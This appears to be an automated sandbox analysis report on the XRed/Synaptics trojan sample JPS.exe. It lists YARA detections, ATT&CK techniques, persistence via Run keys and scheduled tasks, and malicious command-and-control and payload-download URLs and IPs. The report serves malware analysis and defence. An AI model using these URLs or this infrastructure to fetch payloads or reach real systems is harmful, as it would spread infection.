                              Source: Yara matchFile source: Process Memory Space: ._cache_JPS.exe PID: 7544, type: MEMORYSTR
                              Yara detected XRed
                              Source: Yara matchFile source: JPS.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.JPS.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.1387520897.0000000000535000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: JPS.exe PID: 7448, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7604, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX5246.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00AE91DC
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00AE96E2
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_007891DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_007891DC
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_007896E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_007896E2

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information421
                              Scripting                              		2
                              Valid Accounts                              		31
                              Windows Management Instrumentation                              		421
                              Scripting                              		1
                              Exploitation for Privilege Escalation                              		1
                              Disable or Modify Tools                              		21
                              Input Capture                              		2
                              System Time Discovery                              		Remote Services1
                              Archive Collected Data                              		4
                              Ingress Tool Transfer                              		Exfiltration Over Other Network Medium1
                              System Shutdown/Reboot
                              CredentialsDomains1
                              Replication Through Removable Media                              		2
                              Native API                              		1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory1
                              Peripheral Device Discovery                              		Remote Desktop Protocol21
                              Input Capture                              		11
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job                              		2
                              Valid Accounts                              		1
                              Extra Window Memory Injection                              		21
                              Obfuscated Files or Information                              		Security Account Manager1
                              Account Discovery                              		SMB/Windows Admin Shares3
                              Clipboard Data                              		3
                              Non-Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron1
                              Scheduled Task/Job                              		2
                              Valid Accounts                              		11
                              Software Packing                              		NTDS4
                              File and Directory Discovery                              		Distributed Component Object ModelInput Capture34
                              Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd21
                              Registry Run Keys / Startup Folder                              		21
                              Access Token Manipulation                              		1
                              DLL Side-Loading                              		LSA Secrets58
                              System Information Discovery                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                              Process Injection                              		1
                              Extra Window Memory Injection                              		Cached Domain Credentials1
                              Query Registry                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                              Scheduled Task/Job                              		12
                              Masquerading                              		DCSync161
                              Security Software Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job21
                              Registry Run Keys / Startup Folder                              		2
                              Valid Accounts                              		Proc Filesystem31
                              Virtualization/Sandbox Evasion                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                              Virtualization/Sandbox Evasion                              		/etc/passwd and /etc/shadow3
                              Process Discovery                              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                              Access Token Manipulation                              		Network Sniffing11
                              Application Window Discovery                              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                              Process Injection                              		Input Capture1
                              System Owner/User Discovery                              		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582339 Sample: JPS.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 51 freedns.afraid.org 2->51 53 xred.mooo.com 2->53 55 2 other IPs or domains 2->55 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Antivirus detection for URL or domain 2->69 73 18 other signatures 2->73 9 JPS.exe 1 6 2->9         started        12 XNLAGO.exe 2->12         started        15 EXCEL.EXE 227 72 2->15         started        17 6 other processes 2->17 signatures3 71 Uses dynamic DNS services 51->71 process4 file5 43 C:\Users\user\Desktop\._cache_JPS.exe, PE32 9->43 dropped 45 C:\ProgramData\Synaptics\Synaptics.exe, PE32 9->45 dropped 47 C:\ProgramData\Synaptics\RCX5246.tmp, PE32 9->47 dropped 49 C:\...\Synaptics.exe:Zone.Identifier, ASCII 9->49 dropped 19 ._cache_JPS.exe 2 5 9->19         started        24 Synaptics.exe 67 9->24         started        87 Multi AV Scanner detection for dropped file 12->87 89 Machine Learning detection for dropped file 12->89 signatures6 process7 dnsIp8 57 172.111.138.100, 49797, 49903, 50009 VOXILITYGB United States 19->57 37 C:\Users\user\AppData\Roaming\...\XNLAGO.exe, PE32 19->37 dropped 39 C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, ASCII 19->39 dropped 75 Multi AV Scanner detection for dropped file 19->75 77 Machine Learning detection for dropped file 19->77 26 cmd.exe 19->26         started        29 wscript.exe 19->29         started        59 drive.usercontent.google.com 142.250.181.225, 443, 49777, 49778 GOOGLEUS United States 24->59 61 docs.google.com 172.217.18.110, 443, 49761, 49762 GOOGLEUS United States 24->61 63 freedns.afraid.org 69.42.215.252, 49769, 80 AWKNET-LLCUS United States 24->63 41 C:\Users\user\Documents\~$cache1, PE32 24->41 dropped 79 Antivirus detection for dropped file 24->79 81 Drops PE files to the document folder of the user 24->81 31 WerFault.exe 24->31         started        file9 signatures10 process11 signatures12 83 Uses schtasks.exe or at.exe to add and modify task schedules 26->83 33 conhost.exe 26->33         started        35 schtasks.exe 26->35         started        85 Windows Scripting host queries suspicious COM object (likely to drop second stage) 29->85 process13

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              JPS.exe86%VirustotalBrowse
                              JPS.exe92%ReversingLabsWin32.Trojan.Synaptics
                              JPS.exe100%AviraTR/Dldr.Agent.SH
                              JPS.exe100%AviraW2000M/Dldr.Agent.17651006
                              JPS.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\ProgramData\Synaptics\RCX5246.tmp100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\RCX5246.tmp100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\AppData\Local\Temp\BQQQVU.vbs100%AviraVBS/Runner.VPJI
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\Documents\~$cache1100%AviraTR/Dldr.Agent.SH
                              C:\Users\user\Documents\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\RCX5246.tmp100%Joe Sandbox ML
                              C:\Users\user\Desktop\._cache_JPS.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                              C:\Users\user\Documents\~$cache1100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCX5246.tmp92%ReversingLabsWin32.Worm.Zorex
                              C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                              C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe68%ReversingLabsWin32.Trojan.Generic
                              C:\Users\user\Desktop\._cache_JPS.exe68%ReversingLabsWin32.Trojan.Generic
                              C:\Users\user\Documents\~$cache192%ReversingLabsWin32.Worm.Zorex

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://xred.site50.net/syn/SSLLibrary.dlp100%Avira URL Cloudmalware
                              http://xred.site50.net/syn/SUpdate.iniH)100%Avira URL Cloudmalware

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              freedns.afraid.org
                              		69.42.215.252
                              		truefalse
                                		high
                                docs.google.com
                                		172.217.18.110
                                		truefalse
                                  		high
                                  drive.usercontent.google.com
                                  		142.250.181.225
                                  		truefalse
                                    		high
                                    xred.mooo.com
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      xred.mooo.comfalse
                                        		high
                                        http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://freedns.afraid.org/Synaptics.exe, 00000003.00000003.1404566857.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404479772.00000000052E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://docs.google.com/p/cspreportSynaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://docs.google.com/a-cn.netSynaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1RCX5246.tmp.0.drfalse
                                                    		high
                                                    https://docs.google.com/formSynaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://docs.google.com/pt-srcSynaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://docs.google.com/ication/binarySynaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://docs.google.com/ancisco1Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://docs.google.com/0Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://docs.google.com/pSynaptics.exe, 00000003.00000003.1404479772.00000000052E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://docs.google.com/80(Synaptics.exe, 00000003.00000002.1834388588.000000000F097000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://docs.google.com/itySynaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978:ISynaptics.exe, 00000003.00000002.1804199297.000000000050A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://drive.usercontent.google.com/Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://xred.site50.net/syn/Synaptics.rarRCX5246.tmp.0.drfalse
                                                                            		high
                                                                            https://docs.google.com/(Synaptics.exe, 00000003.00000003.1404479772.00000000052E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://docs.google.com/licych-ua-arch=Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://ip-score.com/checkip/._cache_JPS.exe, 00000002.00000002.2559043843.0000000000DE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://docs.google.com/Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834388588.000000000F097000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://docs.google.com/aSynaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://docs.google.com/google.com/Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://docs.google.com/-cn.netSynaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://docs.google.com/_Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1RCX5246.tmp.0.drfalse
                                                                                                  		high
                                                                                                  https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1RCX5246.tmp.0.drfalse
                                                                                                    		high
                                                                                                    https://docs.google.com/USynaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8JPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://xred.site50.net/syn/SUpdate.iniRCX5246.tmp.0.drfalse
                                                                                                            		high
                                                                                                            https://docs.google.com/q8Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://xred.site50.net/syn/SSLLibrary.dlpJPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              		unknown
                                                                                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://docs.google.com/B#F-Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://docs.google.com/leSynaptics.exe, 00000003.00000002.1834388588.000000000F097000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://docs.google.com/oud.google.comSynaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://docs.google.com/uc?id=0;Synaptics.exe, 00000003.00000002.1813960235.00000000078BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1850918353.0000000016BBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1812144797.000000000686E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825438577.000000000C0BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1857423043.00000000194FE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://docs.google.com/reSynaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://xred.site50.net/syn/SUpdate.iniH)JPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown
                                                                                                                          http://xred.site50.net/syn/SSLLibrary.dllRCX5246.tmp.0.drfalse
                                                                                                                            		high
                                                                                                                            https://docs.google.com/riSynaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVl;Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlJPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  		high

                                                                                                                                  World Map of Contacted IPs

                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs

                                                                                                                                  Public IPs

                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  142.250.181.225
                                                                                                                                  		drive.usercontent.google.comUnited States
                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                  172.111.138.100
                                                                                                                                  		unknownUnited States
                                                                                                                                  		3223VOXILITYGBtrue
                                                                                                                                  172.217.18.110
                                                                                                                                  		docs.google.comUnited States
                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                  69.42.215.252
                                                                                                                                  		freedns.afraid.orgUnited States
                                                                                                                                  		17048AWKNET-LLCUSfalse

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                  Analysis ID:1582339
                                                                                                                                  Start date and time:2024-12-30 11:24:21 +01:00
                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 9m 55s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                  Number of analysed new started processes analysed:26
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample name:JPS.exe
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.expl.evad.winEXE@21/53@9/4
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                  • Number of executed functions: 87
                                                                                                                                  • Number of non-executed functions: 279
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                  Warnings

                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.113.194.132, 20.42.73.28, 172.202.163.200, 40.69.42.241, 20.3.187.198, 20.42.65.92, 13.107.246.45, 184.28.90.27, 40.126.32.140, 173.222.162.42
                                                                                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, weu-azsc-config.officeapps.live.com, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, officeclient.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, onedscolprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                  • Execution Graph export aborted for target Synaptics.exe, PID 7604 because there are no executed function
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  05:25:27API Interceptor277x Sleep call for process: Synaptics.exe modified
                                                                                                                                  05:26:09API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                  11:25:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BQQQVU "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                                                                                                                  11:25:24Task SchedulerRun new task: BQQQVU.exe path: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                  11:25:32AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                  11:25:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BQQQVU "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                                                                                                                  11:25:49AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BQQQVU.lnk

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  172.111.138.100222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                    mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                      Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                        Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                          New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                              Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                Purchase Order Supplies.Pdf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                  bf-p2b.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                    gry.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      69.42.215.252222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                      Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                      zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                      Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                      blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                      New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                      RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                      ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                      ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                      Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      freedns.afraid.org222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                                      • 69.42.215.252

                                                                                                                                                      ASNs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
